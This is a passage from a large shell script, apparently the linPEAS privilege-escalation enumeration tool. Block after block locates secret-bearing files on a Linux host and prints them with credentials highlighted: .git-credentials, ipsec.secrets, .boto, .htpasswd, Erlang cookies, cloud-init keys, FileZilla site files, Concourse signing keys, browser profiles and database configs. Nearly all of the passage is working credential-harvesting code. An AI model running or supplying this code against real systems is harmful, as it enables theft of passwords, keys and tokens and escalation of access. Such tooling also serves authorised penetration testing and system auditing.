70)" 10457 if ! [ "`echo \"$PSTORAGE_MOSQUITTO\" | grep -E \"mosquitto\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "mosquitto.conf"; fi; fi; printf "%s" "$PSTORAGE_MOSQUITTO" | grep -E "mosquitto\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,mosquitto\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,password_file.*|psk_file.*|allow_anonymous.*true|auth,${SED_RED},g"; done; echo ""; 10458 fi 10459 10460 10461 if [ "$PSTORAGE_NEO4J" ] || [ "$DEBUG" ]; then 10462 print_2title "Analyzing Neo4j Files (limit 70)" 10463 if ! [ "`echo \"$PSTORAGE_NEO4J\" | grep -E \"neo4j$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "neo4j"; fi; fi; printf "%s" "$PSTORAGE_NEO4J" | grep -E "neo4j$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,neo4j$,${SED_RED},"; find "$f" -name "auth" | while read ff; do ls -ld "$ff" | sed -${E} "s,auth,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; 10464 fi 10465 10466 10467 if [ "$PSTORAGE_CLOUD_INIT" ] || [ "$DEBUG" ]; then 10468 print_2title "Analyzing Cloud Init Files (limit 70)" 10469 if ! [ "`echo \"$PSTORAGE_CLOUD_INIT\" | grep -E \"cloud\.cfg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "cloud.cfg"; fi; fi; printf "%s" "$PSTORAGE_CLOUD_INIT" | grep -E "cloud\.cfg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,cloud\.cfg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy" | grep -Ev "\W+\#|^#" | sed -${E} "s,consumer_key|token_key|token_secret|metadata_url|password:|passwd:|PRIVATE KEY|PRIVATE KEY|encrypted_data_bag_secret|_proxy,${SED_RED},g"; done; echo ""; 10470 fi 10471 10472 10473 if [ "$PSTORAGE_ERLANG" ] || [ "$DEBUG" ]; then 10474 print_2title "Analyzing Erlang Files (limit 70)" 10475 if ! [ "`echo \"$PSTORAGE_ERLANG\" | grep -E \"\.erlang\.cookie$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".erlang.cookie"; fi; fi; printf "%s" "$PSTORAGE_ERLANG" | grep -E "\.erlang\.cookie$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.erlang\.cookie$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10476 fi 10477 10478 10479 if [ "$PSTORAGE_SIP" ] || [ "$DEBUG" ]; then 10480 print_2title "Analyzing SIP Files (limit 70)" 10481 if ! [ "`echo \"$PSTORAGE_SIP\" | grep -E \"sip\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sip.conf"; fi; fi; printf "%s" "$PSTORAGE_SIP" | grep -E "sip\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sip\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,secret.*|allowguest.*=.*true,${SED_RED},g"; done; echo ""; 10482 if ! [ "`echo \"$PSTORAGE_SIP\" | grep -E \"amportal\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "amportal.conf"; fi; fi; printf "%s" "$PSTORAGE_SIP" | grep -E "amportal\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,amportal\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PASS.*=.*,${SED_RED},g"; done; echo ""; 10483 if ! [ "`echo \"$PSTORAGE_SIP\" | grep -E \"FreePBX\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "FreePBX.conf"; fi; fi; printf "%s" "$PSTORAGE_SIP" | grep -E "FreePBX\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,FreePBX\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E ".*AMPDB.*=.*" | sed -${E} "s,.*AMPDB.*=.*,${SED_RED},g"; done; echo ""; 10484 if ! [ "`echo \"$PSTORAGE_SIP\" | grep -E \"Elastix\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Elastix.conf"; fi; fi; printf "%s" "$PSTORAGE_SIP" | grep -E "Elastix\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,Elastix\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*pwd.*=.*,${SED_RED},g"; done; echo ""; 10485 fi 10486 10487 10488 if [ "$PSTORAGE_GMV_AUTH" ] || [ "$DEBUG" ]; then 10489 print_2title "Analyzing GMV Auth Files (limit 70)" 10490 if ! [ "`echo \"$PSTORAGE_GMV_AUTH\" | grep -E \"gvm-tools\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "gvm-tools.conf"; fi; fi; printf "%s" "$PSTORAGE_GMV_AUTH" | grep -E "gvm-tools\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,gvm-tools\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|password.*,${SED_RED},g"; done; echo ""; 10491 fi 10492 10493 10494 if [ "$PSTORAGE_IPSEC" ] || [ "$DEBUG" ]; then 10495 print_2title "Analyzing IPSec Files (limit 70)" 10496 if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.secrets$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ipsec.secrets"; fi; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.secrets$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ipsec\.secrets$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; 10497 if ! [ "`echo \"$PSTORAGE_IPSEC\" | grep -E \"ipsec\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ipsec.conf"; fi; fi; printf "%s" "$PSTORAGE_IPSEC" | grep -E "ipsec\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ipsec\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*PSK.*|.*RSA.*|.*EAP =.*|.*XAUTH.*,${SED_RED},g"; done; echo ""; 10498 fi 10499 10500 10501 if [ "$PSTORAGE_IRSSI" ] || [ "$DEBUG" ]; then 10502 print_2title "Analyzing IRSSI Files (limit 70)" 10503 if ! [ "`echo \"$PSTORAGE_IRSSI\" | grep -E \"\.irssi$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".irssi"; fi; fi; printf "%s" "$PSTORAGE_IRSSI" | grep -E "\.irssi$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.irssi$,${SED_RED},"; find "$f" -name "config" | while read ff; do ls -ld "$ff" | sed -${E} "s,config,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,password.*,${SED_RED},g"; done; echo "";done; echo ""; 10504 fi 10505 10506 10507 if [ "$PSTORAGE_KEYRING" ] || [ "$DEBUG" ]; then 10508 print_2title "Analyzing Keyring Files (limit 70)" 10509 if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"keyrings$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "keyrings"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "keyrings$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,keyrings$,${SED_RED},"; done; echo ""; 10510 if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keyring$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.keyring"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keyring$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.keyring$,${SED_RED},"; done; echo ""; 10511 if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.keystore$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.keystore"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.keystore$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.keystore$,${SED_RED},"; done; echo ""; 10512 if ! [ "`echo \"$PSTORAGE_KEYRING\" | grep -E \"\.jks$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.jks"; fi; fi; printf "%s" "$PSTORAGE_KEYRING" | grep -E "\.jks$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.jks$,${SED_RED},"; done; echo ""; 10513 fi 10514 10515 10516 if [ "$PSTORAGE_VIRTUAL_DISKS" ] || [ "$DEBUG" ]; then 10517 print_2title "Analyzing Virtual Disks Files (limit 70)" 10518 if ! [ "`echo \"$PSTORAGE_VIRTUAL_DISKS\" | grep -E \"\.vhd$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.vhd"; fi; fi; printf "%s" "$PSTORAGE_VIRTUAL_DISKS" | grep -E "\.vhd$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.vhd$,${SED_RED},"; done; echo ""; 10519 if ! [ "`echo \"$PSTORAGE_VIRTUAL_DISKS\" | grep -E \"\.vhdx$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.vhdx"; fi; fi; printf "%s" "$PSTORAGE_VIRTUAL_DISKS" | grep -E "\.vhdx$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.vhdx$,${SED_RED},"; done; echo ""; 10520 if ! [ "`echo \"$PSTORAGE_VIRTUAL_DISKS\" | grep -E \"\.vmdk$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.vmdk"; fi; fi; printf "%s" "$PSTORAGE_VIRTUAL_DISKS" | grep -E "\.vmdk$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.vmdk$,${SED_RED},"; done; echo ""; 10521 fi 10522 10523 10524 if [ "$PSTORAGE_FILEZILLA" ] || [ "$DEBUG" ]; then 10525 print_2title "Analyzing Filezilla Files (limit 70)" 10526 if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "filezilla"; fi; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,filezilla$,${SED_RED},"; find "$f" -name "sitemanager.xml" | while read ff; do ls -ld "$ff" | sed -${E} "s,sitemanager.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^;" | sed -${E} "s,Host.*|Port.*|Protocol.*|User.*|Pass.*,${SED_RED},g"; done; echo "";done; echo ""; 10527 if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"filezilla\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "filezilla.xml"; fi; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "filezilla\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,filezilla\.xml$,${SED_RED},"; done; echo ""; 10528 if ! [ "`echo \"$PSTORAGE_FILEZILLA\" | grep -E \"recentservers\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "recentservers.xml"; fi; fi; printf "%s" "$PSTORAGE_FILEZILLA" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo ""; 10529 fi 10530 10531 10532 if [ "$PSTORAGE_BACKUP_MANAGER" ] || [ "$DEBUG" ]; then 10533 print_2title "Analyzing Backup Manager Files (limit 70)" 10534 if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"storage\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "storage.php"; fi; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "storage\.php$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,storage\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; 10535 if ! [ "`echo \"$PSTORAGE_BACKUP_MANAGER\" | grep -E \"database\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "database.php"; fi; fi; printf "%s" "$PSTORAGE_BACKUP_MANAGER" | grep -E "database\.php$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,database\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "'pass'|'password'|'user'|'database'|'host'" | sed -${E} "s,password|pass|user|database|host,${SED_RED},g"; done; echo ""; 10536 fi 10537 10538 10539 if [ "$PSTORAGE_GIT" ] || [ "$DEBUG" ]; then 10540 print_2title "Analyzing Git Files (limit 70)" 10541 if ! [ "`echo \"$PSTORAGE_GIT\" | grep -E \"\.git-credentials$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".git-credentials"; fi; fi; printf "%s" "$PSTORAGE_GIT" | grep -E "\.git-credentials$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.git-credentials$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10542 fi 10543 10544 10545 if [ "$PSTORAGE_ATLANTIS" ] || [ "$DEBUG" ]; then 10546 print_2title "Analyzing Atlantis Files (limit 70)" 10547 if ! [ "`echo \"$PSTORAGE_ATLANTIS\" | grep -E \"atlantis\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "atlantis.db"; fi; fi; printf "%s" "$PSTORAGE_ATLANTIS" | grep -E "atlantis\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,atlantis\.db$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,CloneURL|Username,${SED_RED},g"; done; echo ""; 10548 fi 10549 10550 10551 if [ "$PSTORAGE_CACHE_VI" ] || [ "$DEBUG" ]; then 10552 print_2title "Analyzing Cache Vi Files (limit 70)" 10553 if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.swp$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.swp"; fi; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.swp$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.swp$,${SED_RED},"; done; echo ""; 10554 if ! [ "`echo \"$PSTORAGE_CACHE_VI\" | grep -E \"\.viminfo$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.viminfo"; fi; fi; printf "%s" "$PSTORAGE_CACHE_VI" | grep -E "\.viminfo$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.viminfo$,${SED_RED},"; done; echo ""; 10555 fi 10556 10557 10558 if [ "$PSTORAGE_FIREFOX" ] || [ "$DEBUG" ]; then 10559 print_2title "Analyzing Firefox Files (limit 70)" 10560 if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"\.mozilla$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".mozilla"; fi; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "\.mozilla$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.mozilla$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 10561 if ! [ "`echo \"$PSTORAGE_FIREFOX\" | grep -E \"Firefox$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Firefox"; fi; fi; printf "%s" "$PSTORAGE_FIREFOX" | grep -E "Firefox$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,Firefox$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 10562 fi 10563 10564 10565 if [ "$PSTORAGE_CHROME" ] || [ "$DEBUG" ]; then 10566 print_2title "Analyzing Chrome Files (limit 70)" 10567 if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"google-chrome$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "google-chrome"; fi; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "google-chrome$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,google-chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 10568 if ! [ "`echo \"$PSTORAGE_CHROME\" | grep -E \"Chrome$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Chrome"; fi; fi; printf "%s" "$PSTORAGE_CHROME" | grep -E "Chrome$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,Chrome$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 10569 fi 10570 10571 10572 if [ "$PSTORAGE_OPERA" ] || [ "$DEBUG" ]; then 10573 print_2title "Analyzing Opera Files (limit 70)" 10574 if ! [ "`echo \"$PSTORAGE_OPERA\" | grep -E \"com\.operasoftware\.Opera$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "com.operasoftware.Opera"; fi; fi; printf "%s" "$PSTORAGE_OPERA" | grep -E "com\.operasoftware\.Opera$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,com\.operasoftware\.Opera$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 10575 fi 10576 10577 10578 if [ "$PSTORAGE_SAFARI" ] || [ "$DEBUG" ]; then 10579 print_2title "Analyzing Safari Files (limit 70)" 10580 if ! [ "`echo \"$PSTORAGE_SAFARI\" | grep -E \"Safari$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Safari"; fi; fi; printf "%s" "$PSTORAGE_SAFARI" | grep -E "Safari$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,Safari$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 10581 fi 10582 10583 10584 if [ "$PSTORAGE_AUTOLOGIN" ] || [ "$DEBUG" ]; then 10585 print_2title "Analyzing Autologin Files (limit 70)" 10586 if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "autologin"; fi; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,autologin$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; 10587 if ! [ "`echo \"$PSTORAGE_AUTOLOGIN\" | grep -E \"autologin\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "autologin.conf"; fi; fi; printf "%s" "$PSTORAGE_AUTOLOGIN" | grep -E "autologin\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,autologin\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,passwd,${SED_RED},g"; done; echo ""; 10588 fi 10589 10590 10591 if [ "$PSTORAGE_FASTCGI" ] || [ "$DEBUG" ]; then 10592 print_2title "Analyzing FastCGI Files (limit 70)" 10593 if ! [ "`echo \"$PSTORAGE_FASTCGI\" | grep -E \"fastcgi_params$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "fastcgi_params"; fi; fi; printf "%s" "$PSTORAGE_FASTCGI" | grep -E "fastcgi_params$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,fastcgi_params$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "DB_NAME|DB_USER|DB_PASS" | sed -${E} "s,DB_NAME|DB_USER|DB_PASS,${SED_RED},g"; done; echo ""; 10594 fi 10595 10596 10597 if [ "$PSTORAGE_FAT_FREE" ] || [ "$DEBUG" ]; then 10598 print_2title "Analyzing Fat-Free Files (limit 70)" 10599 if ! [ "`echo \"$PSTORAGE_FAT_FREE\" | grep -E \"fat\.config$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "fat.config"; fi; fi; printf "%s" "$PSTORAGE_FAT_FREE" | grep -E "fat\.config$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,fat\.config$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "password.*" | sed -${E} "s,password.*,${SED_RED},g"; done; echo ""; 10600 fi 10601 10602 10603 if [ "$PSTORAGE_SHODAN" ] || [ "$DEBUG" ]; then 10604 print_2title "Analyzing Shodan Files (limit 70)" 10605 if ! [ "`echo \"$PSTORAGE_SHODAN\" | grep -E \"api_key$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "api_key"; fi; fi; printf "%s" "$PSTORAGE_SHODAN" | grep -E "api_key$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,api_key$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; 10606 fi 10607 10608 10609 if [ "$PSTORAGE_CONCOURSE" ] || [ "$DEBUG" ]; then 10610 print_2title "Analyzing Concourse Files (limit 70)" 10611 if ! [ "`echo \"$PSTORAGE_CONCOURSE\" | grep -E \"\.flyrc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".flyrc"; fi; fi; printf "%s" "$PSTORAGE_CONCOURSE" | grep -E "\.flyrc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.flyrc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,token:*|value:.*,${SED_RED},g"; done; echo ""; 10612 if ! [ "`echo \"$PSTORAGE_CONCOURSE\" | grep -E \"concourse-auth$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "concourse-auth"; fi; fi; printf "%s" "$PSTORAGE_CONCOURSE" | grep -E "concourse-auth$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,concourse-auth$,${SED_RED},"; find "$f" -name "host-key" | while read ff; do ls -ld "$ff" | sed -${E} "s,host-key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,RSA PRIVATE KEY,${SED_RED},g"; done; echo "";find "$f" -name "local-users" | while read ff; do ls -ld "$ff" | sed -${E} "s,local-users,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name "session-signing-key" | while read ff; do ls -ld "$ff" | sed -${E} "s,session-signing-key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name "worker-key-pub" | while read ff; do ls -ld "$ff" | sed -${E} "s,worker-key-pub,${SED_RED},"; done; echo "";done; echo ""; 10613 if ! [ "`echo \"$PSTORAGE_CONCOURSE\" | grep -E \"concourse-keys$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "concourse-keys"; fi; fi; printf "%s" "$PSTORAGE_CONCOURSE" | grep -E "concourse-keys$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,concourse-keys$,${SED_RED},"; find "$f" -name "host_key" | while read ff; do ls -ld "$ff" | sed -${E} "s,host_key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,RSA PRIVATE KEY,${SED_RED},g"; done; echo "";find "$f" -name "session_signing_key" | while read ff; do ls -ld "$ff" | sed -${E} "s,session_signing_key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name "worker_key.pub" | while read ff; do ls -ld "$ff" | sed -${E} "s,worker_key.pub,${SED_RED},"; done; echo "";done; echo ""; 10614 fi 10615 10616 10617 if [ "$PSTORAGE_BOTO" ] || [ "$DEBUG" ]; then 10618 print_2title "Analyzing Boto Files (limit 70)" 10619 if ! [ "`echo \"$PSTORAGE_BOTO\" | grep -E \"\.boto$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".boto"; fi; fi; printf "%s" "$PSTORAGE_BOTO" | grep -E "\.boto$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.boto$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10620 fi 10621 10622 10623 if [ "$PSTORAGE_SNMP" ] || [ "$DEBUG" ]; then 10624 print_2title "Analyzing SNMP Files (limit 70)" 10625 if ! [ "`echo \"$PSTORAGE_SNMP\" | grep -E \"snmpd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "snmpd.conf"; fi; fi; printf "%s" "$PSTORAGE_SNMP" | grep -E "snmpd\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,snmpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rocommunity|rwcommunity|extend.*|^createUser" | sed -${E} "s,rocommunity|rwcommunity|extend.*|^createUser,${SED_RED},g"; done; echo ""; 10626 fi 10627 10628 10629 if [ "$PSTORAGE_PYPIRC" ] || [ "$DEBUG" ]; then 10630 print_2title "Analyzing Pypirc Files (limit 70)" 10631 if ! [ "`echo \"$PSTORAGE_PYPIRC\" | grep -E \"\.pypirc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".pypirc"; fi; fi; printf "%s" "$PSTORAGE_PYPIRC" | grep -E "\.pypirc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.pypirc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username|password,${SED_RED},g"; done; echo ""; 10632 fi 10633 10634 10635 if [ "$PSTORAGE_POSTFIX" ] || [ "$DEBUG" ]; then 10636 print_2title "Analyzing Postfix Files (limit 70)" 10637 if ! [ "`echo \"$PSTORAGE_POSTFIX\" | grep -E \"aliases$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "aliases"; fi; fi; printf "%s" "$PSTORAGE_POSTFIX" | grep -E "aliases$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,aliases$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "\|" | sed -${E} "s,\|,${SED_RED},g"; done; echo ""; 10638 if ! [ "`echo \"$PSTORAGE_POSTFIX\" | grep -E \"postfix$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "postfix"; fi; fi; printf "%s" "$PSTORAGE_POSTFIX" | grep -E "postfix$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,postfix$,${SED_RED},"; find "$f" -name "master.cf" | while read ff; do ls -ld "$ff" | sed -${E} "s,master.cf,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "user=" | sed -${E} "s,user=|argv=,${SED_RED},g"; done; echo "";done; echo ""; 10639 fi 10640 10641 10642 if [ "$PSTORAGE_CLOUDFLARE" ] || [ "$DEBUG" ]; then 10643 print_2title "Analyzing CloudFlare Files (limit 70)" 10644 if ! [ "`echo \"$PSTORAGE_CLOUDFLARE\" | grep -E \"\.cloudflared$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".cloudflared"; fi; fi; printf "%s" "$PSTORAGE_CLOUDFLARE" | grep -E "\.cloudflared$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.cloudflared$,${SED_RED},"; ls -lRA "$f";done; echo ""; 10645 fi 10646 10647 10648 if [ "$PSTORAGE_HTTP_CONF" ] || [ "$DEBUG" ]; then 10649 print_2title "Analyzing Http conf Files (limit 70)" 10650 if ! [ "`echo \"$PSTORAGE_HTTP_CONF\" | grep -E \"httpd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "httpd.conf"; fi; fi; printf "%s" "$PSTORAGE_HTTP_CONF" | grep -E "httpd\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,httpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "htaccess.*|htpasswd.*" | grep -Ev "\W+\#|^#" | sed -${E} "s,htaccess.*|htpasswd.*,${SED_RED},g"; done; echo ""; 10651 fi 10652 10653 10654 if [ "$PSTORAGE_HTPASSWD" ] || [ "$DEBUG" ]; then 10655 print_2title "Analyzing Htpasswd Files (limit 70)" 10656 if ! [ "`echo \"$PSTORAGE_HTPASSWD\" | grep -E \"\.htpasswd$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".htpasswd"; fi; fi; printf "%s" "$PSTORAGE_HTPASSWD" | grep -E "\.htpasswd$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.htpasswd$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; 10657 fi 10658 10659 10660 if [ "$PSTORAGE_LDAPRC" ] || [ "$DEBUG" ]; then 10661 print_2title "Analyzing Ldaprc Files (limit 70)" 10662 if ! [ "`echo \"$PSTORAGE_LDAPRC\" | grep -E \"\.ldaprc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".ldaprc"; fi; fi; printf "%s" 